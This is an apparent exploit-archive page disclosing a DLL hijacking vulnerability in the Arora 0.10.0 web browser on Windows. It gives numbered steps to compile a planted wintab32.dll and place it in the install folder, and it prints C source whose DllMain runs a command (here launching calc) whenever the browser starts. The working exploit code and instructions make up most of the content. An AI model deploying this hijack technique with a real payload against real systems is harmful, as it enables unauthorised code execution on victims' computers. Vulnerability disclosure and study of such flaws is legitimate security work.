Arora 0.10.0 Windows Qt 4.5.3 DLL Hijack

2012.10.29

Credit: Metropolis

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

/*
# Exploit Title: Arora 0.10.0 Windows Qt 4.5.3 DLL Hijacking Exploit (wintab32.dll)
# Date: 27/10/2012
# Author: Metropolis
# Url: http://metropolis.fr.cr
# Software Link: http://code.google.com/p/arora/downloads/detail?name=Arora%200.10.0-1%20Installer.exe&can=2&q=
# Version: 0.10.0
# Tested on: Windows 7
# Information:
# http://code.google.com/p/arora/
# Instructions:
# 1. Compile dll  
# gcc -shared -o wintab32.dll wintab32.c
# 2. Add wintab32.dll
# C:\Program Files (x86)\Arora
# 3. Launch Arora.exe
# 4. Calc DLL Hijacked! 
*/

#include <windows.h>
 
int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}

References:

http://metropolis.fr.cr

http://code.google.com/p/arora/downloads/detail?name=Arora%200.10.0-1%20Installer.exe&can=2&q

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Arora 0.10.0 Windows Qt 4.5.3 DLL Hijack

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.